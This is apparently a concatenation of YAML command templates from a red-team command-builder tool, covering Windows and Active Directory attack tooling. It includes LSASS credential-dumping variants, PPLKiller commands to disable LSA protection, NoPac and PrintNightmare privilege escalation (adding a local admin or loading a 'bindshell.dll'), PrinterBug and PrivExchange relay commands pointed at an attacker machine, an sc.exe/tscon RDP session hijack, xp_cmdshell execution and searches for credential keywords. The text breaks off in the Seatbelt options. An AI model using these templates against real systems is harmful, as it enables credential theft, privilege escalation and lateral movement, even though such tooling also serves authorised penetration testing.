[DumpPath] 133 | - name: Get a handle with seclogon leak local, read LSASS indirectly by using a fork. Write the dump with a valid signature 134 | labels: [LSASS, Creds] 135 | mitre: '' 136 | verb: '' 137 | required_flags: [SeclogonLeakLocal, Fork, Valid, DumpPath] 138 | optional_flags: [] 139 | - name: Duplicate an existing handle and write the dump to disk with an invalid signature. 140 | labels: [LSASS, Creds] 141 | mitre: '' 142 | verb: '' 143 | required_flags: [Duplicate, DumpPath] 144 | optional_flags: [] 145 | - name: Trick seclogon to open a handle to LSASS and duplicate it. 146 | labels: [LSASS, Creds] 147 | mitre: '' 148 | verb: '' 149 | required_flags: [SeclogonDuplicate] 150 | optional_flags: [DumpPath] 151 | - name: Open a handle to LSASS with an spoofed callstack. 152 | labels: [LSASS, Creds] 153 | mitre: '' 154 | verb: '' 155 | required_flags: [SpoofCallstack] 156 | optional_flags: [DumpPath] 157 | - name: Make the WerFault.exe process create a full memory dump in the Temp folder. 158 | labels: [LSASS, Creds] 159 | mitre: '' 160 | verb: '' 161 | required_flags: [SilentProcessExit] 162 | optional_flags: [] 163 | - name: Use the Shtinkering techinque (Werfault). 164 | labels: [LSASS, Creds] 165 | mitre: '' 166 | verb: '' 167 | required_flags: [Shtinkering] 168 | optional_flags: [] 169 | - name: Obtain a handle using seclogon leak local and create the dump using the Shtinkering techinque. 170 | labels: [LSASS, Creds] 171 | mitre: '' 172 | verb: '' 173 | required_flags: [SeclogonLeakLocal, Shtinkering] 174 | optional_flags: [] 175 | - name: Obtain a handle with low privs using a spoofed callstack and elevate it. 176 | labels: [LSASS, Creds] 177 | mitre: '' 178 | verb: '' 179 | required_flags: [EelevateHandle, SpoofCallstack] 180 | optional_flags: [] 181 | - name: Duplicate an existing low priv handle and elevate it. 182 | labels: [LSASS, Creds] 183 | mitre: '' 184 | verb: '' 185 | required_flags: [DuplicateLow] 186 | optional_flags: [] 187 | - name: Get the Process ID of LSASS.exe. 188 | labels: [LSASS, Creds] 189 | mitre: '' 190 | verb: '' 191 | required_flags: [GetPid] 192 | optional_flags: [] -------------------------------------------------------------------------------- /commands/NoPac.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/cube0x0/noPac 3 | name: NoPac 4 | languages: 5 | - name: EXE 6 | prefix: NoPac.exe 7 | 8 | params: 9 | - name: Domain 10 | type: text 11 | description: Domain name 12 | template: "-domain {0}" 13 | default: example.local 14 | optional: false 15 | - name: UserName 16 | type: text 17 | description: Username 18 | template: "-user {0}" 19 | default: User1 20 | optional: false 21 | - name: Password 22 | type: text 23 | description: Password 24 | template: "-pass {0}" 25 | default: Password123 26 | optional: false 27 | - name: DomainController 28 | type: text 29 | description: Domain controller 30 | template: "/dc {0}" 31 | default: 32 | optional: true 33 | - name: mAccount 34 | type: text 35 | description: New computer account to create 36 | template: "/mAccount {0}" 37 | default: NoPacTest 38 | optional: true 39 | - name: mPassword 40 | type: text 41 | description: New computer account password 42 | template: "/mPassword {0}" 43 | default: P@ssw0rd 44 | optional: true 45 | - name: Service 46 | type: text 47 | description: Service of service ticket 48 | template: "/service {0}" 49 | default: cifs 50 | optional: true 51 | 52 | - name: Flags 53 | type: label 54 | 55 | - name: PTT 56 | type: flag 57 | description: Pass-The-Ticket 58 | value: /ptt 59 | optional: true 60 | selected: false 61 | 62 | sections: 63 | - name: Self crafted command 64 | labels: ["PrivEsc", "AD", "Impersonation"] 65 | mitre: '' 66 | verb: '' 67 | required_flags: [Domain, Username, Password] 68 | optional_flags: [DomainController, mAccount, mPassword, Service, PTT] 69 | 70 | - name: Execute NoPac 71 | labels: ["PrivEsc", "AD", "Impersonation"] 72 | mitre: '' 73 | verb: '' 74 | required_flags: [Domain, Username, Password, DomainController, mAccount, mPassword, Service] 75 | optional_flags: [PTT] 76 | 77 | - name: Check ticket size (~500 bytes is vulnrable) 78 | labels: ["PrivEsc", "AD", "Impersonation"] 79 | mitre: '' 80 | verb: '' 81 | required_flags: [Domain, Username, Password] 82 | optional_flags: [] -------------------------------------------------------------------------------- /commands/PPLDump.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/itm4n/PPLdump 3 | name: PPLDump 4 | languages: 5 | - name: EXE 6 | prefix: '' 7 | 8 | params: 9 | - name: ProccessName 10 | type: text 11 | description: Number of concurrent threads 12 | template: "{0}" 13 | default: '' 14 | optional: true 15 | 16 | - name: ProccessID 17 | type: text 18 | description: Number of concurrent threads 19 | template: "{0}" 20 | default: '' 21 | optional: true 22 | 23 | - name: DumpFile 24 | type: text 25 | description: Number of concurrent threads 26 | template: "{0}" 27 | default: 'C:\temp\out' 28 | optional: true 29 | 30 | - name: Verbose 31 | type: flag 32 | description: Verbose output 33 | value: '-v' 34 | optional: true 35 | selected: false 36 | 37 | - name: DebugMode 38 | type: flag 39 | description: Enable Debug mode 40 | value: '-d' 41 | optional: true 42 | selected: false 43 | 44 | - name: Force 45 | type: flag 46 | description: Bypass DefineDosDevice error check 47 | value: '-f' 48 | optional: true 49 | selected: false 50 | 51 | sections: 52 | - name: Dump PPL process memory 53 | labels: [LSASS, Creds] 54 | mitre: '' 55 | verb: '' 56 | required_flags: [DumpFile] 57 | optional_flags: [ProccessName, ProccessID, Verbose, DebugMode, Force] 58 | -------------------------------------------------------------------------------- /commands/PPLKiller.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/RedCursorSecurityConsulting/PPLKiller 3 | name: PPLKiller 4 | params: 5 | - name: Command 6 | description: description 7 | 8 | sections: 9 | - name: Installing PPLKiller Driver 10 | labels: ["Lateral", "Creds", "Protection Bypassing"] 11 | commands: 12 | - language: EXE 13 | command: PPLKiller.exe /installDriver 14 | 15 | - name: Disabling PPL 16 | labels: ["Lateral", "Creds", "Protection Bypassing"] 17 | commands: 18 | - language: EXE 19 | command: PPLKiller.exe /disableLSAProtection 20 | 21 | - name: Uninstalling PPLKiller Driver (cleanup) 22 | labels: ["Lateral", "Creds", "Protection Bypassing"] 23 | commands: 24 | - language: EXE 25 | command: PPLKiller.exe /uninstallDriver 26 | -------------------------------------------------------------------------------- /commands/PingCastle.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://www.pingcastle.com/ 3 | name: PingCastle 4 | languages: 5 | - name: EXE 6 | prefix: PingCastle.exe 7 | 8 | params: 9 | - name: DomainController 10 | type: text 11 | description: Specify Domain Controller to execute check against 12 | template: "--server {0}" 13 | default: 14 | optional: false 15 | - name: PcScanner 16 | description: The scanner to use 17 | default: aclcheck 18 | template: "--scanner {0}" 19 | type: select 20 | options: 21 | [ 22 | "aclcheck", 23 | "antivirus", 24 | "computerversion", 25 | "foreignusers", 26 | "laps_bitlocker", 27 | "localadmin", 28 | "nullsession", 29 | "nullsession-trust", 30 | "oxidbindings", 31 | "remote", 32 | "share", 33 | "smb", 34 | "smb3querynetwork", 35 | "spooler", 36 | "startup", 37 | "zerologon", 38 | ] 39 | optional: false 40 | - name: Username 41 | type: text 42 | description: Username to use for PingCastle scan 43 | template: "--user {0}" 44 | default: User1 45 | optional: false 46 | - name: Password 47 | type: text 48 | description: Password to use for PingCastle scan 49 | template: "--password {0}" 50 | default: Password123 51 | optional: false 52 | 53 | - name: Flags 54 | type: label 55 | 56 | - name: HealthCheck 57 | type: flag 58 | description: desc 59 | value: --healthcheck 60 | optional: true 61 | selected: false 62 | - name: DateFile 63 | type: flag 64 | description: desc 65 | value: --datefile 66 | optional: true 67 | selected: false 68 | - name: NoEnumLimit 69 | type: flag 70 | description: desc 71 | value: --no-enum-limit 72 | optional: true 73 | selected: false 74 | - name: Reachable 75 | type: flag 76 | description: desc 77 | value: --reachable 78 | optional: true 79 | selected: false 80 | - name: ExploreTrust 81 | type: flag 82 | description: desc 83 | value: --explore-trust 84 | optional: true 85 | selected: false 86 | - name: ExploreForestTrust 87 | type: flag 88 | description: desc 89 | value: --explore-forest-trust 90 | optional: true 91 | selected: false 92 | 93 | sections: 94 | - name: Execute PingCastle HealthCheck against all domains in forest 95 | labels: ["Recon", "AD"] 96 | mitre: 'T1590.001' 97 | verb: '' 98 | required_flags: [HealthCheck, DomainController] 99 | optional_flags: [] 100 | 101 | - name: Execute PingCastle Specific scanner with specific credentials 102 | labels: ["Recon", "AD", "Creds"] 103 | mitre: 'T1590.001' 104 | verb: '' 105 | required_flags: [PcScanner, Username, Password] 106 | optional_flags: [] 107 | 108 | # --- 109 | 110 | # sections: 111 | # - name: Execute PingCastle HealthCheck against all domains in forest 112 | # labels: ["Recon", "AD"] 113 | # mitre: 'T1590.001' 114 | # commands: 115 | # - language: EXE 116 | # command: PingCastle.exe --healthcheck --server * 117 | # - name: Execute PingCastle thorough HealthCheck against all domains in forest 118 | # labels: ["Recon", "AD"] 119 | # mitre: 'T1590.001' 120 | # commands: 121 | # - language: EXE 122 | # command: PingCastle.exe --healthcheck --server * --level Full --datefile --no-enum-limit --reachable --explore-trust --explore-forest-trust 123 | # - name: Execute PingCastle thorough HealthCheck against all domains in forest with specific credentials 124 | # labels: ["Recon", "AD"] 125 | # mitre: 'T1590.001' 126 | # commands: 127 | # - language: EXE 128 | # command: PingCastle.exe --healthcheck --server * --level Full --datefile --no-enum-limit --reachable --explore-trust --explore-forest-trust --user {{Username}} --password {{Password}} 129 | # - name: Execute PingCastle HealthCheck against specific DC 130 | # labels: ["Recon", "AD"] 131 | # mitre: 'T1590.001' 132 | # commands: 133 | # - language: EXE 134 | # command: PingCastle.exe --healthcheck --server {{DomainController}} 135 | # - name: Execute PingCastle Specific scanner 136 | # labels: ["Recon", "AD"] 137 | # mitre: 'T1590.001' 138 | # commands: 139 | # - language: EXE 140 | # command: PingCastle.exe --scanner {{PcScanner}} 141 | # - name: Execute PingCastle Specific scanner with specific credentials 142 | # labels: ["Recon", "AD", "Creds"] 143 | # mitre: 'T1590.001' 144 | # commands: 145 | # - language: EXE 146 | # command: PingCastle.exe --scanner {{PcScanner}} --user {{Username}} --password {{Password}} -------------------------------------------------------------------------------- /commands/PowerUpSQL.yaml: -------------------------------------------------------------------------------- 1 | projectLink: https://github.com/NetSPI/PowerUpSQL 2 | name: PowerUpSQL 3 | languages: 4 | - name: PS 5 | prefix: '' 6 | 7 | params: 8 | - name: Target 9 | type: label 10 | 11 | - name: Instance 12 | type: text 13 | description: The SQL server instance 14 | template: "-Instance {0}" 15 | default: MSSQLSRV04\SOMESQL 16 | optional: true 17 | 18 | - name: IPAddress 19 | type: text 20 | description: IP Address of SQL Server 21 | template: "-IPAddress {0}" 22 | default: '10.0.0.1' 23 | optional: true 24 | 25 | - name: IPRange 26 | type: text 27 | description: IP Address Range In CIDR Format to Audit 28 | template: "-IPRange {0}" 29 | default: '10.0.0.1/24' 30 | optional: true 31 | 32 | - name: ComputerName 33 | type: text 34 | description: Specific hostname to interact with 35 | template: "-ComputerName {0}" 36 | default: '' 37 | optional: true 38 | 39 | - name: FilePath 40 | type: text 41 | description: Load SQL targets from a file 42 | template: "-FilePath {0}" 43 | default: 'c:\temp\computers.txt' 44 | optional: true 45 | 46 | - name: Authentication 47 | type: label 48 | 49 | - name: Username 50 | type: text 51 | description: SQL Server or domain account to authenticate with 52 | template: "-Username {0}" 53 | default: '' 54 | optional: true 55 | 56 | - name: Password 57 | type: text 58 | description: SQL Server or domain account password to authenticate with 59 | template: "-Password {0}" 60 | default: '' 61 | optional: true 62 | 63 | - name: Crednetial 64 | type: text 65 | description: A type of [System.Management.Automation.PSCredential] parameter to authenticate 66 | template: "-Crednetial {0}" 67 | default: 68 | optional: true 69 | 70 | - name: WorkstationId 71 | type: text 72 | description: Spoof the name of the workstation/hostname your connecting to the server with 73 | template: "{0}" 74 | default: 'dc01' 75 | optional: true 76 | 77 | - name: Execution 78 | type: label 79 | 80 | - name: Query 81 | type: text 82 | description: Query to be executed on the SQL Server 83 | template: "-Query {0}" 84 | default: '"Select @@version"' 85 | optional: true 86 | 87 | - name: Command 88 | type: text 89 | description: Operating command to be executed on the SQL Server 90 | template: "-Command {0}" 91 | default: 'whoami' 92 | optional: true 93 | 94 | - name: Exploit 95 | type: flag 96 | description: Exploit idnetified audit issues 97 | value: '-Exploit' 98 | optional: true 99 | selected: false 100 | 101 | - name: Filter 102 | type: label 103 | 104 | - name: DatabaseName 105 | type: text 106 | description: Database name filter 107 | template: "-DatabaseName {0}" 108 | default: '' 109 | optional: true 110 | 111 | - name: TableName 112 | type: text 113 | description: Table name filter 114 | template: "-TableName {0}" 115 | default: '' 116 | optional: true 117 | 118 | - name: ColumnName 119 | type: text 120 | description: Column name filter 121 | template: "-ColumnName {0}" 122 | default: '' 123 | optional: true 124 | 125 | - name: ColumnNameSearch 126 | type: text 127 | description: Column name filter that support wildcards 128 | template: "-ColumnNameSearch {0}" 129 | default: 'passwords' 130 | optional: true 131 | 132 | - name: NoDefaults 133 | type: flag 134 | description: Don't list anything from default databases 135 | value: '-NoDefaults' 136 | optional: true 137 | selected: false 138 | 139 | - name: Options 140 | type: label 141 | 142 | - name: OutFolder 143 | type: text 144 | description: Output folder to store SQL audit results (csv) 145 | template: "-OutFolder {0}" 146 | default: 'OUTPUT' 147 | optional: true 148 | 149 | - name: Threads 150 | type: text 151 | description: Number of concurrent threads 152 | template: "-Threads {0}" 153 | default: '5' 154 | optional: true 155 | 156 | - name: Timeout 157 | type: text 158 | description: Connection timeout 159 | template: "-Timeout {0}" 160 | default: 1 161 | optional: true 162 | 163 | - name: Verbose 164 | type: flag 165 | description: Enable console verbosity 166 | value: '-Verbose' 167 | optional: true 168 | selected: false 169 | 170 | - name: Encrypt 171 | type: flag 172 | description: Use an encrypted connection 173 | value: '-Encrypt' 174 | optional: true 175 | selected: false 176 | 177 | - name: DAC 178 | type: flag 179 | description: Connect using Dedicated Admin Connection 180 | value: '-DAC' 181 | optional: true 182 | selected: false 183 | 184 | - name: RawResults 185 | type: flag 186 | description: Just show the raw results of an execution without the computer or instance name 187 | value: '-RawResults' 188 | optional: true 189 | selected: false 190 | 191 | - name: HasAccess 192 | type: flag 193 | description: Only select databases the current user has access to 194 | value: '-HasAccess' 195 | optional: true 196 | selected: false 197 | 198 | - name: SysAdminOnly 199 | type: flag 200 | description: Only select databases owned by a sysadmin 201 | value: '-SysAdminOnly' 202 | optional: true 203 | selected: false 204 | 205 | - name: NoOutput 206 | type: flag 207 | description: Don't output anything 208 | value: '-NoOutput' 209 | optional: true 210 | selected: false 211 | 212 | 213 | 214 | sections: 215 | 216 | - name: Discover Active Directory's SQL Server instances 217 | labels: [Recon,SQL] 218 | mitre: '' 219 | verb: 'Get-SQLInstanceDomain' 220 | required_flags: [] 221 | optional_flags: [Verbose,SysAdminOnly] 222 | 223 | - name: Discover Remote SQL Instances via UDP scan 224 | labels: [Recon,SQL] 225 | mitre: '' 226 | verb: 'Get-SQLInstanceScanUDPThreaded' 227 | required_flags: [ComputerName] 228 | optional_flags: [IPADddress,IPRange,Verbose] 229 | 230 | - name: Get server info from a specified instance 231 | labels: [Recon,SQL] 232 | mitre: '' 233 | verb: 'Get-SQLServerInfo' 234 | required_flags: [Instance] 235 | optional_flags: [Username,Password,Credential,Verbose] 236 | 237 | - name: Test autentication to SQL instance (Uses current user if credentials are not supplied) 238 | labels: [Recon,SQL] 239 | mitre: '' 240 | verb: 'Get-SQLConnectionTestThreaded' 241 | required_flags: [Instance] 242 | optional_flags: [IPAddress,IPRange,Database,Username,Password,Credential,Threads,Verbose,Timeout,DAC,HasAccess] 243 | 244 | - name: Execute a query on target SQL servers 245 | labels: [Recon,SQL] 246 | mitre: '' 247 | verb: 'Get-SQLQuery' 248 | required_flags: [Instance, Query] 249 | optional_flags: [Username,Password,Credential,Database,Verbose,Timeout,DAC,Threads,WorkstationId,Encrypt] 250 | 251 | - name: Audit for high impact weak configurations by running all privilege escalation checks 252 | labels: [PrivEsc] 253 | mitre: '' 254 | verb: 'Invoke-SQLAudit' 255 | required_flags: [Instance] 256 | optional_flags: [Username,Password,Credential,Exploit,OutFolder,NoOutput] 257 | 258 | - name: Execute OS commands - xp_cmdshell 259 | labels: [Lateral] 260 | mitre: 'T1505.001' 261 | verb: 'Invoke-SQLOSCmd' 262 | required_flags: [Instance,Command] 263 | optional_flags: [Username,Password,Credential,Verbose] 264 | 265 | - name: Execute OS commands - CLR 266 | labels: [Lateral] 267 | mitre: 'T1505.001' 268 | verb: 'Invoke-SQLOSCLR' 269 | required_flags: [Instance,Command] 270 | optional_flags: [Username,Password,Credential,Verbose] 271 | 272 | - name: Crawl database links 273 | labels: [Recon] 274 | mitre: '' 275 | verb: 'Get-SqlServerLinkCrawl' 276 | required_flags: [Instance] 277 | optional_flags: [Username,Password,Credential,Verbose] 278 | 279 | - name: Dump an inventory of common objects to csv in the current directory 280 | labels: [Recon] 281 | mitre: '' 282 | verb: 'Invoke-SQLDumpInfo' 283 | required_flags: [Instance] 284 | optional_flags: [Username,Password,Credential,OutFolder,Verbose] -------------------------------------------------------------------------------- /commands/PowerView.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/PowerShellMafia/PowerSploit 3 | params: 4 | - name: Domain 5 | description: Name of the domain to enumerate. 6 | default: example.local 7 | - name: Forest 8 | description: Name of the forest to enumerate. 9 | default: example.local 10 | 11 | sections: 12 | - name: Find user with SPN 13 | labels: ["Recon"] 14 | commands: 15 | - language: PS 16 | command: Get-NetUser -SPN 17 | 18 | - name: Domain trusts for the current domain 19 | labels: ["Recon"] 20 | mitre: '' 21 | commands: 22 | - language: PS 23 | command: |- 24 | Get-NetDomainTrust 25 | Get-NetDomainTrust –Domain {{Domain}} 26 | 27 | - name: Details about the current forest 28 | labels: ["Recon"] 29 | mitre: '' 30 | commands: 31 | - language: PS 32 | command: |- 33 | Get-NetForest 34 | Get-NetForest –Forest {{Forest}} -------------------------------------------------------------------------------- /commands/PrinterBug.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/dirkjanm/krbrelayx 3 | name: PrinterBug 4 | params: 5 | - name: Domain 6 | description: Domain 7 | - name: Username 8 | description: Low privileged User 9 | - name: Password 10 | description: Password 11 | - name: AttackerMachine 12 | description: Attacker machine with ntlmrelayx 13 | - name: Target 14 | description: Target with spooler service 15 | 16 | sections: 17 | - name: Execute spooler exploit to trigger computer account smb authentication 18 | labels: ["Lateral", "CVE", "Relaying"] 19 | commands: 20 | - language: PY 21 | command: printerbug.py {{Domain}}/{{Username}}:{{Password}}@{{Target}} {{AttackerMachine}} 22 | -------------------------------------------------------------------------------- /commands/PrinterNightmareLPE.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/calebstewart/CVE-2021-1675 3 | name: PrinterNightmareLPE 4 | languages: 5 | - name: PS 6 | prefix: Invoke-Nightmare 7 | 8 | params: 9 | - name: DriverName 10 | type: text 11 | description: Name of driver that will be installed 12 | template: "-DriverName \"{0}\"" 13 | default: Xerox 14 | optional: true 15 | - name: NewUser 16 | type: text 17 | description: Name of the new administrator 18 | template: "-NewUser \"{0}\"" 19 | default: john 20 | optional: true 21 | - name: NewPassword 22 | type: text 23 | description: Password of the new administrator 24 | template: "-NewPassword \"{0}\"" 25 | default: SuperSecure 26 | optional: true 27 | - name: DLL 28 | type: text 29 | description: Path of dll to that will be executed 30 | template: "-DLL \"{0}\"" 31 | default: C:\absolute\path\to\your\bindshell.dll 32 | optional: true 33 | 34 | sections: 35 | - name: Self crafted 36 | labels: ["PrivEsc", "Driver", "CVE"] 37 | mitre: '' 38 | verb: '' 39 | required_flags: [] 40 | optional_flags: [DriverName, NewUser, NewPassword, DLL] 41 | - name: Add a new user to the local administrators group by default 42 | labels: ["PrivEsc", "Driver", "CVE"] 43 | mitre: '' 44 | verb: '' 45 | required_flags: [DriverName, NewUSer, NewPassword] 46 | optional_flags: [] 47 | - name: Supply a custom DLL payload, to do anything else you might like 48 | labels: ["PrivEsc", "Driver", "CVE"] 49 | mitre: '' 50 | verb: '' 51 | required_flags: [DLL] 52 | optional_flags: [] -------------------------------------------------------------------------------- /commands/PrivExchange.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/dirkjanm/PrivExchange 3 | name: PrivExchange 4 | params: 5 | - name: Domain 6 | description: Domain 7 | - name: Username 8 | description: Username with mailbox 9 | - name: Password 10 | description: Password of username 11 | - name: AttackerMachine 12 | description: Attacker machine with ntlmrelayx 13 | - name: Target 14 | description: Owa server name 15 | 16 | sections: 17 | - name: Trigger Exchange HTTP Authentication 18 | labels: ["Lateral", "CVE", "Relaying"] 19 | commands: 20 | - language: Py 21 | command: privexchange.py -d {{Domain}} -u {{Username}} -p {{Password}} -ah {{AttackerMachine}} {{Target}} 22 | -------------------------------------------------------------------------------- /commands/PsExec.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec 3 | name: PsExec 4 | languages: 5 | - name: EXE 6 | prefix: psexec 7 | 8 | params: 9 | 10 | - name: Target 11 | type: label 12 | 13 | - name: computer 14 | type: text 15 | description: Execute an application on the remote computer or computers specified (comma seperated). If you omit the computer name, PsExec runs the application on the local system 16 | template: "\\\\{0}" 17 | default: 'victim.domain.local' 18 | optional: false 19 | 20 | - name: fileinput 21 | type: text 22 | description: PsExec will execute the command on each of the computers listed in the file 23 | template: "@{0}" 24 | default: 25 | optional: true 26 | selected: false 27 | 28 | - name: Authentication 29 | type: label 30 | 31 | - name: username 32 | type: text 33 | description: Specifies optional user name for login to remote computer 34 | template: "-u {0}" 35 | default: 36 | optional: true 37 | selected: false 38 | 39 | - name: password 40 | type: text 41 | description: 'Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password' 42 | template: "-p {0}" 43 | default: 44 | optional: true 45 | selected: false 46 | 47 | - name: File Operation 48 | type: label 49 | 50 | - name: copy 51 | type: text 52 | description: Copy the specified executable to the remote system for execution. If you omit this option the application must be in the system path on the remote system 53 | template: "-c {0}" 54 | default: 'mal.exe' 55 | optional: false 56 | 57 | - name: force-copy 58 | type: flag 59 | description: Copy the specified program even if the file already exists on the remote system 60 | value: '-f' 61 | optional: true 62 | selected: false 63 | 64 | - name: Execution 65 | type: label 66 | 67 | - name: application 68 | type: text 69 | description: Name of application to execute 70 | template: "\"{0}\"" 71 | default: 'c:\windows\system32\cmd.exe' 72 | optional: false 73 | 74 | - name: arguments 75 | type: text 76 | description: Arguments to pass (note that file paths must be absolute paths on the target system) 77 | template: "{0}" 78 | default: '' 79 | optional: true 80 | selected: false 81 | 82 | - name: working-dir 83 | type: text 84 | description: Set the working directory of the process (relative to remote computer) 85 | template: "-w {0}" 86 | default: '' 87 | optional: true 88 | selected: false 89 | 90 | - name: service-name 91 | type: text 92 | description: Specifies the name of the remote service to create or interact with 93 | template: "-r {0}" 94 | default: 95 | optional: true 96 | selected: false 97 | 98 | - name: Timeouts 99 | type: label 100 | 101 | - name: timeout 102 | type: text 103 | description: Specifies timeout in seconds connecting to remote computers 104 | template: "-n {0}" 105 | default: '5' 106 | optional: true 107 | selected: false 108 | 109 | - name: Flags 110 | type: label 111 | 112 | - name: system 113 | type: flag 114 | description: Run the remote process in the System account. 115 | value: '-s' 116 | optional: true 117 | selected: false 118 | 119 | - name: interactive 120 | type: flag 121 | description: 'Run the program so that it interacts with the desktop of the specified session on the remote system. If no session is specified the process runs in the console session. This flag is required when attempting to run console applications interactively' 122 | value: '-i' 123 | optional: true 124 | selected: false 125 | 126 | - name: accepteula 127 | type: flag 128 | description: Suppress the display of the license dialog 129 | value: '-accepteula' 130 | optional: true 131 | selected: false 132 | 133 | - name: nowait 134 | type: flag 135 | description: Don't wait for process to terminate (non-interactive). 136 | value: -d 137 | optional: true 138 | selected: false 139 | 140 | - name: lowpriv 141 | type: flag 142 | description: Run process as limited user (strips the Administrators group and allows only privileges assigned to the Users group) 143 | value: '-l' 144 | optional: true 145 | selected: false 146 | 147 | sections: 148 | - name: Launch interactive command prompt on a remote computer, optionally specifying username and password to autnheticate 149 | labels: [Lateral] 150 | mitre: 'T1588.002' 151 | verb: '' 152 | required_flags: [interactive, computer, application] 153 | optional_flags: [username, password, nowait, system, lowpriv, accepteula, working-dir] 154 | 155 | - name: Copy local program to the remote system and execute it interactively, optionally specify application arguments 156 | labels: [Lateral] 157 | mitre: 'T1608.002' 158 | verb: '' 159 | required_flags: [interactive, computer, copy] 160 | optional_flags: [arguments, force-copy, username, password, nowait, working-dir, accepteula] 161 | 162 | - name: Run local application interactively with the System account privileges 163 | labels: [PrivEsc] 164 | mitre: '' 165 | verb: '' 166 | required_flags: [interactive, nowait, system, application] 167 | optional_flags: [arguments, nowait, accepteula] -------------------------------------------------------------------------------- /commands/RDPHijack.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: 3 | name: RDPHijack 4 | params: 5 | - name: ServiceName 6 | description: name of service that will be created 7 | - name: TargetSessionNumber 8 | description: the number of the session to hijack 9 | - name: CurrentRDPSessionNumber 10 | description: the number of the current RDP session 11 | 12 | sections: 13 | - name: Hijack RDP Session (run command as system) 14 | labels: ['Lateral', 'Creds'] 15 | commands: 16 | - language: EXE 17 | command: |- 18 | Sc.exe create {{ServiceName}} binpath="cmd.exe /k tscon {{TargetSessionNumber}} /dest:rdp-tcp#{{CurrentRDPSessionNumber}}" 19 | net start {{ServiceName}} 20 | -------------------------------------------------------------------------------- /commands/SQL.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | params: 3 | - name: Table 4 | description: Table name 5 | sections: 6 | - name: Query specific table 7 | labels: [] 8 | commands: 9 | - language: EXE 10 | command: select * from {{Table}} 11 | -------------------------------------------------------------------------------- /commands/SauronEye.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/vivami/SauronEye 3 | name: SauronEye 4 | languages: 5 | - name: EXE 6 | prefix: SauronEye.exe 7 | 8 | params: 9 | - name: directories 10 | type: text 11 | description: Directories to search 12 | template: "--directories {0}" 13 | default: 'C:\ "\\SOME NETWORK DRIVE\C$"' 14 | optional: false 15 | - name: filetypes 16 | type: text 17 | description: File types to search 18 | template: "--FileTypes {0}" 19 | default: ".txt .bat .docx .conf" 20 | optional: true 21 | - name: keywords 22 | type: text 23 | description: Keywords to search for 24 | template: "--keywords {0}" 25 | default: "*pass* user creds secret key AKIA ASIA" 26 | optional: true 27 | - name: maxfilesize 28 | type: text 29 | description: Max file size to search contents in, in kilobytes 30 | template: "--maxfilesize {0}" 31 | default: 5000000 32 | optional: true 33 | - name: BeforeDate 34 | type: text 35 | description: "Filter files last modified before this date, format: yyyy-MM-dd" 36 | template: "--BeforeDate {0}" 37 | default: "2020-07-23" 38 | optional: true 39 | - name: AfterDate 40 | type: text 41 | description: "Filter files last modified after this date, format: yyyy-MM-dd" 42 | template: "--AfterDate {0}" 43 | default: "2020-07-23" 44 | optional: true 45 | 46 | sections: 47 | - name: Self crafted command 48 | labels: ["Recon"] 49 | mitre: 'T1595.003' 50 | verb: '' 51 | required_flags: [directories] 52 | optional_flags: [filetypes, keywords, maxfilesize, BeforeDate, AfterDate] 53 | 54 | - name: Search files by suffix 55 | labels: ["Recon"] 56 | mitre: "T1595.003" 57 | verb: '' 58 | required_flags: ["directories", "filetypes"] 59 | optional_flags: [] 60 | 61 | 62 | - name: Search files by suffix and keywords 63 | labels: ["Recon"] 64 | mitre: "T1595.003" 65 | verb: '' 66 | required_flags: ["directories", "filetypes", "keywords"] 67 | optional_flags: [] 68 | 69 | 70 | - name: Search files by suffix and keywords which modified date is after a specific date 71 | labels: ["Recon"] 72 | mitre: "T1595.003" 73 | verb: '' 74 | required_flags: ["directories", "filetypes", "keywords", "AfterDate"] 75 | optional_flags: [] 76 | 77 | 78 | - name: Search files by suffix and keywords which modified date is before a specific date 79 | labels: ["Recon"] 80 | mitre: "T1595.003" 81 | verb: '' 82 | required_flags: ["directories", "filetypes", "keywords", "BeforeDate"] 83 | optional_flags: [] 84 | 85 | 86 | - name: Search the contents of files with provdied suffix with keywords 87 | labels: ["Recon"] 88 | mitre: "T1595.003" 89 | verb: '' 90 | required_flags: ["directories", "filetypes", "keywords", "contents"] 91 | optional_flags: [] 92 | 93 | 94 | - name: Search files and content by size of files 95 | labels: ["Recon"] 96 | mitre: "T1595.003" 97 | verb: '' 98 | required_flags: ["directories", "filetypes", "keywords", "maxfilesize", "contents"] 99 | optional_flags: [] 100 | -------------------------------------------------------------------------------- /commands/Seatbelt.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/Seatbelt 3 | sigmaRulesURL: https://raw.githubusercontent.com/SigmaHQ/sigma/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml 4 | name: Seatbelt 5 | languages: 6 | - name: EXE 7 | prefix: Seatbelt.exe 8 | - name: Apollo 9 | prefix: inline_assembly -Assembly "Seatbelt.exe" -Arguments " 10 | 11 | params: 12 | - name: Seatbelt commands 13 | type: label 14 | 15 | - name: SbGroup 16 | description: Specify Seatbelt recon group. 17 | default: "All" 18 | template: "-group={0}" 19 | type: select 20 | options: ["All", "User", "System", "Slack", "Chromium", "Remote", "Misc"] 21 | optional: true 22 | - name: SbCommand 23 | description: Command option for seatbelt 24 | default: "AMSIProviders" 25 | template: "{0}" 26 | type: select 27 | options: 28 | [ 29 | "AMSIProviders", 30 | "AntiVirus", 31 | "AppLocker", 32 | "ARPTable", 33 | "AuditPolicies", 34 | "AuditPolicyRegistry", 35 | "AutoRuns", 36 | "Certificates", 37 | "CertificateThumbprints", 38 | "ChromiumBookmarks", 39 | "ChromiumHistory", 40 | "ChromiumPresence", 41 | "CloudCredentials", 42 | "CloudSyncProviders", 43 | "CredEnum", 44 | "CredGuard", 45 | "dir", 46 | "DNSCache", 47 | "DotNet", 48 | 